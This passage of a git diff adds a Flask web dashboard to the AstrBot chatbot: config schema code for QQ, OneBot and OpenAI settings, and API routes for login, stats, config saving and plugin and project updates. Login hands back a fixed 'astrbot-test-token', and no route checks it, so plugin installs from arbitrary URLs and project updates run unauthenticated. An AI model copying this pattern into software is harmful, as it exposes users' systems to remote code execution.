219.136a15.616 15.616 0 0 1-22.528 16.384l-196.608-102.4-196.608 102.4a15.616 15.616 0 0 1-22.528-16.384l37.12-219.136-159.232-155.136a15.616 15.616 0 0 1 8.704-25.6l219.904-32 98.304-199.168a15.616 15.616 0 0 1 28.16-1.024z" fill="#FFF5CC" p-id="1546"></path><path d="M665.6 409.6a444.16 444.16 0 0 0 25.6-61.44l-65.536-9.472-99.584-198.656a15.616 15.616 0 0 0-27.904 0l-98.304 199.168L179.2 371.2a15.616 15.616 0 0 0-8.704 25.6l159.744 156.16-15.104 87.04A407.808 407.808 0 0 0 665.6 409.6z" fill="#FFFFFF" p-id="1547"></path></svg>
|
||||
|
After Width: | Height: | Size: 1.5 KiB |
21
addons/dashboard/dist/index.html
vendored
Normal file
@@ -0,0 +1,21 @@
|
||||
<!doctype html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="UTF-8" />
|
||||
<link rel="icon" href="/favicon.svg" />
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
|
||||
<meta name="keywords" content="AstrBot Soulter" />
|
||||
<meta name="description" content="AstrBot Dashboard" />
|
||||
<link
|
||||
rel="stylesheet"
|
||||
href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&family=Poppins:wght@400;500;600;700&family=Roboto:wght@400;500;700&display=swap"
|
||||
/>
|
||||
<title>AstrBot - 仪表盘</title>
|
||||
<script type="module" crossorigin src="/assets/index-dc96e1be.js"></script>
|
||||
<link rel="stylesheet" href="/assets/index-0f1523f3.css">
|
||||
</head>
|
||||
<body>
|
||||
<div id="app"></div>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
533
addons/dashboard/helper.py
Normal file
@@ -0,0 +1,533 @@
|
||||
from addons.dashboard.server import AstrBotDashBoard, DashBoardData
|
||||
from pydantic import BaseModel
|
||||
from typing import Union, Optional
|
||||
import uuid
|
||||
from util import general_utils as gu
|
||||
from util.cmd_config import CmdConfig
|
||||
from dataclasses import dataclass
|
||||
import sys
|
||||
import os
|
||||
import threading
|
||||
import time
|
||||
import asyncio
|
||||
from util.plugin_dev.api.v1.config import update_config
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot-core')
|
||||
|
||||
|
||||
@dataclass
|
||||
class DashBoardConfig():
|
||||
config_type: str
|
||||
name: Optional[str] = None
|
||||
description: Optional[str] = None
|
||||
path: Optional[str] = None # 仅 item 才需要
|
||||
body: Optional[list['DashBoardConfig']] = None # 仅 group 才需要
|
||||
value: Optional[Union[list, dict, str, int, bool]] = None # 仅 item 才需要
|
||||
val_type: Optional[str] = None # 仅 item 才需要
|
||||
|
||||
|
||||
class DashBoardHelper():
|
||||
def __init__(self, global_object, config: dict):
|
||||
self.loop = asyncio.new_event_loop()
|
||||
asyncio.set_event_loop(self.loop)
|
||||
dashboard_data = global_object.dashboard_data
|
||||
dashboard_data.configs = {
|
||||
"data": []
|
||||
}
|
||||
self.parse_default_config(dashboard_data, config)
|
||||
self.dashboard_data: DashBoardData = dashboard_data
|
||||
self.dashboard = AstrBotDashBoard(global_object)
|
||||
self.key_map = {} # key: uuid, value: config key name
|
||||
self.cc = CmdConfig()
|
||||
|
||||
@self.dashboard.register("post_configs")
|
||||
def on_post_configs(post_configs: dict):
|
||||
try:
|
||||
if 'base_config' in post_configs:
|
||||
self.save_config(
|
||||
post_configs['base_config'], namespace='') # 基础配置
|
||||
self.save_config(
|
||||
post_configs['config'], namespace=post_configs['namespace']) # 选定配置
|
||||
self.parse_default_config(
|
||||
self.dashboard_data, self.cc.get_all())
|
||||
# 重启
|
||||
threading.Thread(target=self.dashboard.shutdown_bot,
|
||||
args=(2,), daemon=True).start()
|
||||
except Exception as e:
|
||||
raise e
|
||||
|
||||
# 将 config.yaml、 中的配置解析到 dashboard_data.configs 中
|
||||
def parse_default_config(self, dashboard_data: DashBoardData, config: dict):
|
||||
|
||||
try:
|
||||
qq_official_platform_group = DashBoardConfig(
|
||||
config_type="group",
|
||||
name="QQ_OFFICIAL 平台配置",
|
||||
description="",
|
||||
body=[
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="启用 QQ_OFFICIAL 平台",
|
||||
description="官方的接口,仅支持 QQ 频道。详见 q.qq.com",
|
||||
value=config['qqbot']['enable'],
|
||||
path="qqbot.enable",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="QQ机器人APPID",
|
||||
description="详见 q.qq.com",
|
||||
value=config['qqbot']['appid'],
|
||||
path="qqbot.appid",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="QQ机器人令牌",
|
||||
description="详见 q.qq.com",
|
||||
value=config['qqbot']['token'],
|
||||
path="qqbot.token",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="QQ机器人 Secret",
|
||||
description="详见 q.qq.com",
|
||||
value=config['qqbot_secret'],
|
||||
path="qqbot_secret",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="是否允许 QQ 频道私聊",
|
||||
description="如果启用,机器人会响应私聊消息。",
|
||||
value=config['direct_message_mode'],
|
||||
path="direct_message_mode",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="是否接收QQ群消息",
|
||||
description="需要机器人有相应的群消息接收权限。在 q.qq.com 上查看。",
|
||||
value=config['qqofficial_enable_group_message'],
|
||||
path="qqofficial_enable_group_message",
|
||||
),
|
||||
]
|
||||
)
|
||||
qq_gocq_platform_group = DashBoardConfig(
|
||||
config_type="group",
|
||||
name="OneBot协议平台配置",
|
||||
description="",
|
||||
body=[
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="启用",
|
||||
description="支持cq-http、shamrock等(目前仅支持QQ平台)",
|
||||
value=config['gocqbot']['enable'],
|
||||
path="gocqbot.enable",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="HTTP 服务器地址",
|
||||
description="",
|
||||
value=config['gocq_host'],
|
||||
path="gocq_host",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="int",
|
||||
name="HTTP 服务器端口",
|
||||
description="",
|
||||
value=config['gocq_http_port'],
|
||||
path="gocq_http_port",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="int",
|
||||
name="WebSocket 服务器端口",
|
||||
description="目前仅支持正向 WebSocket",
|
||||
value=config['gocq_websocket_port'],
|
||||
path="gocq_websocket_port",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="是否响应群消息",
|
||||
description="",
|
||||
value=config['gocq_react_group'],
|
||||
path="gocq_react_group",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="是否响应私聊消息",
|
||||
description="",
|
||||
value=config['gocq_react_friend'],
|
||||
path="gocq_react_friend",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="是否响应群成员增加消息",
|
||||
description="",
|
||||
value=config['gocq_react_group_increase'],
|
||||
path="gocq_react_group_increase",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="是否响应频道消息",
|
||||
description="",
|
||||
value=config['gocq_react_guild'],
|
||||
path="gocq_react_guild",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="int",
|
||||
name="转发阈值(字符数)",
|
||||
description="机器人回复的消息长度超出这个值后,会被折叠成转发卡片发出以减少刷屏。",
|
||||
value=config['qq_forward_threshold'],
|
||||
path="qq_forward_threshold",
|
||||
),
|
||||
]
|
||||
)
|
||||
|
||||
general_platform_detail_group = DashBoardConfig(
|
||||
config_type="group",
|
||||
name="通用平台配置",
|
||||
description="",
|
||||
body=[
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="启动消息文字转图片",
|
||||
description="启动后,机器人会将消息转换为图片发送,以降低风控风险。",
|
||||
value=config['qq_pic_mode'],
|
||||
path="qq_pic_mode",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="int",
|
||||
name="消息限制时间",
|
||||
description="在此时间内,机器人不会回复同一个用户的消息。单位:秒",
|
||||
value=config['limit']['time'],
|
||||
path="limit.time",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="int",
|
||||
name="消息限制次数",
|
||||
description="在上面的时间内,如果用户发送消息超过此次数,则机器人不会回复。单位:次",
|
||||
value=config['limit']['count'],
|
||||
path="limit.count",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="回复前缀",
|
||||
description="[xxxx] 你好! 其中xxxx是你可以填写的前缀。如果为空则不显示。",
|
||||
value=config['reply_prefix'],
|
||||
path="reply_prefix",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="list",
|
||||
name="通用管理员用户 ID(支持多个管理员)。通过 !myid 指令获取。",
|
||||
description="",
|
||||
value=config['other_admins'],
|
||||
path="other_admins",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="独立会话",
|
||||
description="是否启用独立会话模式,即 1 个用户自然账号 1 个会话。",
|
||||
value=config['uniqueSessionMode'],
|
||||
path="uniqueSessionMode",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="LLM 唤醒词",
|
||||
description="如果不为空, 那么只有当消息以此词开头时,才会调用大语言模型进行回复。如设置为 /chat,那么只有当消息以 /chat 开头时,才会调用大语言模型进行回复。",
|
||||
value=config['llm_wake_prefix'],
|
||||
path="llm_wake_prefix",
|
||||
)
|
||||
]
|
||||
)
|
||||
|
||||
openai_official_llm_group = DashBoardConfig(
|
||||
config_type="group",
|
||||
name="OpenAI 官方接口类设置",
|
||||
description="",
|
||||
body=[
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="list",
|
||||
name="OpenAI API Key",
|
||||
description="OpenAI API 的 Key。支持使用非官方但兼容的 API(第三方中转key)。",
|
||||
value=config['openai']['key'],
|
||||
path="openai.key",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="OpenAI API 节点地址(api base)",
|
||||
description="OpenAI API 的节点地址,配合非官方 API 使用。如果不想填写,那么请填写 none",
|
||||
value=config['openai']['api_base'],
|
||||
path="openai.api_base",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="OpenAI model",
|
||||
description="OpenAI LLM 模型。详见 https://platform.openai.com/docs/api-reference/chat",
|
||||
value=config['openai']['chatGPTConfigs']['model'],
|
||||
path="openai.chatGPTConfigs.model",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="int",
|
||||
name="OpenAI max_tokens",
|
||||
description="OpenAI 最大生成长度。详见 https://platform.openai.com/docs/api-reference/chat",
|
||||
value=config['openai']['chatGPTConfigs']['max_tokens'],
|
||||
path="openai.chatGPTConfigs.max_tokens",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="float",
|
||||
name="OpenAI temperature",
|
||||
description="OpenAI 温度。详见 https://platform.openai.com/docs/api-reference/chat",
|
||||
value=config['openai']['chatGPTConfigs']['temperature'],
|
||||
path="openai.chatGPTConfigs.temperature",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="float",
|
||||
name="OpenAI top_p",
|
||||
description="OpenAI top_p。详见 https://platform.openai.com/docs/api-reference/chat",
|
||||
value=config['openai']['chatGPTConfigs']['top_p'],
|
||||
path="openai.chatGPTConfigs.top_p",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="float",
|
||||
name="OpenAI frequency_penalty",
|
||||
description="OpenAI frequency_penalty。详见 https://platform.openai.com/docs/api-reference/chat",
|
||||
value=config['openai']['chatGPTConfigs']['frequency_penalty'],
|
||||
path="openai.chatGPTConfigs.frequency_penalty",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="float",
|
||||
name="OpenAI presence_penalty",
|
||||
description="OpenAI presence_penalty。详见 https://platform.openai.com/docs/api-reference/chat",
|
||||
value=config['openai']['chatGPTConfigs']['presence_penalty'],
|
||||
path="openai.chatGPTConfigs.presence_penalty",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="int",
|
||||
name="OpenAI 总生成长度限制",
|
||||
description="OpenAI 总生成长度限制。详见 https://platform.openai.com/docs/api-reference/chat",
|
||||
value=config['openai']['total_tokens_limit'],
|
||||
path="openai.total_tokens_limit",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="OpenAI 图像生成模型",
|
||||
description="OpenAI 图像生成模型。",
|
||||
value=config['openai_image_generate']['model'],
|
||||
path="openai_image_generate.model",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="OpenAI 图像生成大小",
|
||||
description="OpenAI 图像生成大小。",
|
||||
value=config['openai_image_generate']['size'],
|
||||
path="openai_image_generate.size",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="OpenAI 图像生成风格",
|
||||
description="OpenAI 图像生成风格。修改前请参考 OpenAI 官方文档",
|
||||
value=config['openai_image_generate']['style'],
|
||||
path="openai_image_generate.style",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="OpenAI 图像生成质量",
|
||||
description="OpenAI 图像生成质量。修改前请参考 OpenAI 官方文档",
|
||||
value=config['openai_image_generate']['quality'],
|
||||
path="openai_image_generate.quality",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="问题题首提示词",
|
||||
description="如果填写了此项,在每个对大语言模型的请求中,都会在问题前加上此提示词。",
|
||||
value=config['llm_env_prompt'],
|
||||
path="llm_env_prompt",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="默认人格文本",
|
||||
description="默认人格文本",
|
||||
value=config['default_personality_str'],
|
||||
path="default_personality_str",
|
||||
),
|
||||
]
|
||||
)
|
||||
|
||||
baidu_aip_group = DashBoardConfig(
|
||||
config_type="group",
|
||||
name="百度内容审核",
|
||||
description="需要去申请",
|
||||
body=[
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="启动百度内容审核服务",
|
||||
description="",
|
||||
value=config['baidu_aip']['enable'],
|
||||
path="baidu_aip.enable"
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="APP ID",
|
||||
description="",
|
||||
value=config['baidu_aip']['app_id'],
|
||||
path="baidu_aip.app_id"
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="API KEY",
|
||||
description="",
|
||||
value=config['baidu_aip']['api_key'],
|
||||
path="baidu_aip.api_key"
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="SECRET KEY",
|
||||
description="",
|
||||
value=config['baidu_aip']['secret_key'],
|
||||
path="baidu_aip.secret_key"
|
||||
)
|
||||
]
|
||||
)
|
||||
|
||||
other_group = DashBoardConfig(
|
||||
config_type="group",
|
||||
name="其他配置",
|
||||
description="其他配置描述",
|
||||
body=[
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="HTTP 代理地址",
|
||||
description="建议上下一致",
|
||||
value=config['http_proxy'],
|
||||
path="http_proxy",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="HTTPS 代理地址",
|
||||
description="建议上下一致",
|
||||
value=config['https_proxy'],
|
||||
path="https_proxy",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="面板用户名",
|
||||
description="是的,就是你理解的这个面板的用户名",
|
||||
value=config['dashboard_username'],
|
||||
path="dashboard_username",
|
||||
),
|
||||
]
|
||||
)
|
||||
|
||||
dashboard_data.configs['data'] = [
|
||||
qq_official_platform_group,
|
||||
qq_gocq_platform_group,
|
||||
general_platform_detail_group,
|
||||
openai_official_llm_group,
|
||||
other_group,
|
||||
baidu_aip_group
|
||||
]
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"配置文件解析错误:{e}")
|
||||
raise e
|
||||
|
||||
def save_config(self, post_config: list, namespace: str):
|
||||
'''
|
||||
根据 path 解析并保存配置
|
||||
'''
|
||||
|
||||
queue = post_config
|
||||
while len(queue) > 0:
|
||||
config = queue.pop(0)
|
||||
if config['config_type'] == "group":
|
||||
for item in config['body']:
|
||||
queue.append(item)
|
||||
elif config['config_type'] == "item":
|
||||
if config['path'] is None or config['path'] == "":
|
||||
continue
|
||||
|
||||
path = config['path'].split('.')
|
||||
if len(path) == 0:
|
||||
continue
|
||||
|
||||
if config['val_type'] == "bool":
|
||||
self._write_config(
|
||||
namespace, config['path'], config['value'])
|
||||
elif config['val_type'] == "str":
|
||||
self._write_config(
|
||||
namespace, config['path'], config['value'])
|
||||
elif config['val_type'] == "int":
|
||||
try:
|
||||
self._write_config(
|
||||
namespace, config['path'], int(config['value']))
|
||||
except:
|
||||
raise ValueError(f"配置项 {config['name']} 的值必须是整数")
|
||||
elif config['val_type'] == "float":
|
||||
try:
|
||||
self._write_config(
|
||||
namespace, config['path'], float(config['value']))
|
||||
except:
|
||||
raise ValueError(f"配置项 {config['name']} 的值必须是浮点数")
|
||||
elif config['val_type'] == "list":
|
||||
if config['value'] is None:
|
||||
self._write_config(namespace, config['path'], [])
|
||||
elif not isinstance(config['value'], list):
|
||||
raise ValueError(f"配置项 {config['name']} 的值必须是列表")
|
||||
self._write_config(
|
||||
namespace, config['path'], config['value'])
|
||||
else:
|
||||
raise NotImplementedError(
|
||||
f"未知或者未实现的配置项类型:{config['val_type']}")
|
||||
|
||||
def _write_config(self, namespace: str, key: str, value):
|
||||
if namespace == "" or namespace.startswith("internal_"):
|
||||
# 机器人自带配置,存到 config.yaml
|
||||
self.cc.put_by_dot_str(key, value)
|
||||
else:
|
||||
update_config(namespace, key, value)
|
||||
|
||||
def run(self):
|
||||
self.dashboard.run()
|
||||
476
addons/dashboard/server.py
Normal file
@@ -0,0 +1,476 @@
|
||||
import util.plugin_util as putil
|
||||
import websockets
|
||||
import json
|
||||
import threading
|
||||
import asyncio
|
||||
import os
|
||||
import sys
|
||||
import time
|
||||
|
||||
from flask import Flask, request
|
||||
from flask.logging import default_handler
|
||||
from werkzeug.serving import make_server
|
||||
from util import general_utils as gu
|
||||
from dataclasses import dataclass
|
||||
from persist.session import dbConn
|
||||
from type.register import RegisteredPlugin
|
||||
from typing import List
|
||||
from util.cmd_config import CmdConfig
|
||||
from util.updator import check_update, update_project, request_release_info
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot-core')
|
||||
|
||||
@dataclass
|
||||
class DashBoardData():
|
||||
stats: dict
|
||||
configs: dict
|
||||
logs: dict
|
||||
plugins: List[RegisteredPlugin]
|
||||
|
||||
|
||||
@dataclass
|
||||
class Response():
|
||||
status: str
|
||||
message: str
|
||||
data: dict
|
||||
|
||||
|
||||
class AstrBotDashBoard():
|
||||
def __init__(self, global_object: 'gu.GlobalObject'):
|
||||
self.global_object = global_object
|
||||
self.loop = asyncio.get_event_loop()
|
||||
asyncio.set_event_loop(self.loop)
|
||||
self.dashboard_data: DashBoardData = global_object.dashboard_data
|
||||
self.dashboard_be = Flask(
|
||||
__name__, static_folder="dist", static_url_path="/")
|
||||
self.funcs = {}
|
||||
self.cc = CmdConfig()
|
||||
self.ws_clients = {} # remote_ip: ws
|
||||
# 启动 websocket 服务器
|
||||
self.ws_server = websockets.serve(self.__handle_msg, "0.0.0.0", 6186)
|
||||
|
||||
@self.dashboard_be.get("/")
|
||||
def index():
|
||||
# 返回页面
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.get("/config")
|
||||
def rt_config():
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.get("/logs")
|
||||
def rt_logs():
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.get("/extension")
|
||||
def rt_extension():
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.get("/dashboard/default")
|
||||
def rt_dashboard():
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.post("/api/authenticate")
|
||||
def authenticate():
|
||||
username = self.cc.get("dashboard_username", "")
|
||||
password = self.cc.get("dashboard_password", "")
|
||||
# 获得请求体
|
||||
post_data = request.json
|
||||
if post_data["username"] == username and post_data["password"] == password:
|
||||
return Response(
|
||||
status="success",
|
||||
message="登录成功。",
|
||||
data={
|
||||
"token": "astrbot-test-token",
|
||||
"username": username
|
||||
}
|
||||
).__dict__
|
||||
else:
|
||||
return Response(
|
||||
status="error",
|
||||
message="用户名或密码错误。",
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/change_password")
|
||||
def change_password():
|
||||
password = self.cc.get("dashboard_password", "")
|
||||
# 获得请求体
|
||||
post_data = request.json
|
||||
if post_data["password"] == password:
|
||||
self.cc.put("dashboard_password", post_data["new_password"])
|
||||
return Response(
|
||||
status="success",
|
||||
message="修改成功。",
|
||||
data=None
|
||||
).__dict__
|
||||
else:
|
||||
return Response(
|
||||
status="error",
|
||||
message="原密码错误。",
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/stats")
|
||||
def get_stats():
|
||||
db_inst = dbConn()
|
||||
all_session = db_inst.get_all_stat_session()
|
||||
last_24_message = db_inst.get_last_24h_stat_message()
|
||||
# last_24_platform = db_inst.get_last_24h_stat_platform()
|
||||
platforms = db_inst.get_platform_cnt_total()
|
||||
self.dashboard_data.stats["session"] = []
|
||||
self.dashboard_data.stats["session_total"] = db_inst.get_session_cnt_total(
|
||||
)
|
||||
self.dashboard_data.stats["message"] = last_24_message
|
||||
self.dashboard_data.stats["message_total"] = db_inst.get_message_cnt_total(
|
||||
)
|
||||
self.dashboard_data.stats["platform"] = platforms
|
||||
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=self.dashboard_data.stats
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/configs")
|
||||
def get_configs():
|
||||
# 如果params中有namespace,则返回该namespace下的配置
|
||||
# 否则返回所有配置
|
||||
namespace = "" if "namespace" not in request.args else request.args["namespace"]
|
||||
conf = self._get_configs(namespace)
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=conf
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/config_outline")
|
||||
def get_config_outline():
|
||||
outline = self._generate_outline()
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=outline
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/configs")
|
||||
def post_configs():
|
||||
post_configs = request.json
|
||||
try:
|
||||
self.funcs["post_configs"](post_configs)
|
||||
return Response(
|
||||
status="success",
|
||||
message="保存成功~ 机器人将在 2 秒内重启以应用新的配置。",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=self.dashboard_data.configs
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/extensions")
|
||||
def get_plugins():
|
||||
_plugin_resp = []
|
||||
for plugin in self.dashboard_data.plugins:
|
||||
_p = plugin.metadata
|
||||
_t = {
|
||||
"name": _p.plugin_name,
|
||||
"repo": '' if _p.repo is None else _p.repo,
|
||||
"author": _p.author,
|
||||
"desc": _p.desc,
|
||||
"version": _p.version
|
||||
}
|
||||
_plugin_resp.append(_t)
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=_plugin_resp
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/extensions/install")
|
||||
def install_plugin():
|
||||
post_data = request.json
|
||||
repo_url = post_data["url"]
|
||||
try:
|
||||
logger.info(f"正在安装插件 {repo_url}")
|
||||
putil.install_plugin(repo_url, self.dashboard_data.plugins)
|
||||
logger.info(f"安装插件 {repo_url} 成功")
|
||||
return Response(
|
||||
status="success",
|
||||
message="安装成功~",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/extensions/uninstall")
|
||||
def uninstall_plugin():
|
||||
post_data = request.json
|
||||
plugin_name = post_data["name"]
|
||||
try:
|
||||
logger.info(f"正在卸载插件 {plugin_name}")
|
||||
putil.uninstall_plugin(
|
||||
plugin_name, self.dashboard_data.plugins)
|
||||
logger.info(f"卸载插件 {plugin_name} 成功")
|
||||
return Response(
|
||||
status="success",
|
||||
message="卸载成功~",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/extensions/update")
|
||||
def update_plugin():
|
||||
post_data = request.json
|
||||
plugin_name = post_data["name"]
|
||||
try:
|
||||
logger.info(f"正在更新插件 {plugin_name}")
|
||||
putil.update_plugin(plugin_name, self.dashboard_data.plugins)
|
||||
logger.info(f"更新插件 {plugin_name} 成功")
|
||||
return Response(
|
||||
status="success",
|
||||
message="更新成功~",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/log")
|
||||
def log():
|
||||
for item in self.ws_clients:
|
||||
try:
|
||||
asyncio.run_coroutine_threadsafe(
|
||||
self.ws_clients[item].send(request.data.decode()), self.loop)
|
||||
except Exception as e:
|
||||
pass
|
||||
return 'ok'
|
||||
|
||||
@self.dashboard_be.get("/api/check_update")
|
||||
def get_update_info():
|
||||
try:
|
||||
ret = check_update()
|
||||
return Response(
|
||||
status="success",
|
||||
message=ret,
|
||||
data={
|
||||
"has_new_version": ret != "当前已经是最新版本。" # 先这样吧,累了=.=
|
||||
}
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/update_project")
|
||||
def update_project_api():
|
||||
version = request.json['version']
|
||||
if version == "" or version == "latest":
|
||||
latest = True
|
||||
version = ''
|
||||
else:
|
||||
latest = False
|
||||
try:
|
||||
update_project(request_release_info(latest),
|
||||
latest=latest, version=version)
|
||||
threading.Thread(target=self.shutdown_bot, args=(3,)).start()
|
||||
return Response(
|
||||
status="success",
|
||||
message="更新成功,机器人将在 3 秒内重启。",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/llm/list")
|
||||
def llm_list():
|
||||
ret = []
|
||||
for llm in self.global_object.llms:
|
||||
ret.append(llm.llm_name)
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=ret
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/llm")
|
||||
def llm():
|
||||
text = request.args["text"]
|
||||
llm = request.args["llm"]
|
||||
for llm_ in self.global_object.llms:
|
||||
if llm_.llm_name == llm:
|
||||
try:
|
||||
# ret = await llm_.llm_instance.text_chat(text)
|
||||
ret = asyncio.run_coroutine_threadsafe(
|
||||
llm_.llm_instance.text_chat(text), self.loop).result()
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=ret
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
return Response(
|
||||
status="error",
|
||||
message="LLM not found.",
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
def shutdown_bot(self, delay_s: int):
|
||||
time.sleep(delay_s)
|
||||
py = sys.executable
|
||||
os.execl(py, py, *sys.argv)
|
||||
|
||||
def _get_configs(self, namespace: str):
|
||||
if namespace == "":
|
||||
ret = [self.dashboard_data.configs['data'][4],
|
||||
self.dashboard_data.configs['data'][5],]
|
||||
elif namespace == "internal_platform_qq_official":
|
||||
ret = [self.dashboard_data.configs['data'][0],]
|
||||
elif namespace == "internal_platform_qq_gocq":
|
||||
ret = [self.dashboard_data.configs['data'][1],]
|
||||
elif namespace == "internal_platform_general": # 全局平台配置
|
||||
ret = [self.dashboard_data.configs['data'][2],]
|
||||
elif namespace == "internal_llm_openai_official":
|
||||
ret = [self.dashboard_data.configs['data'][3],]
|
||||
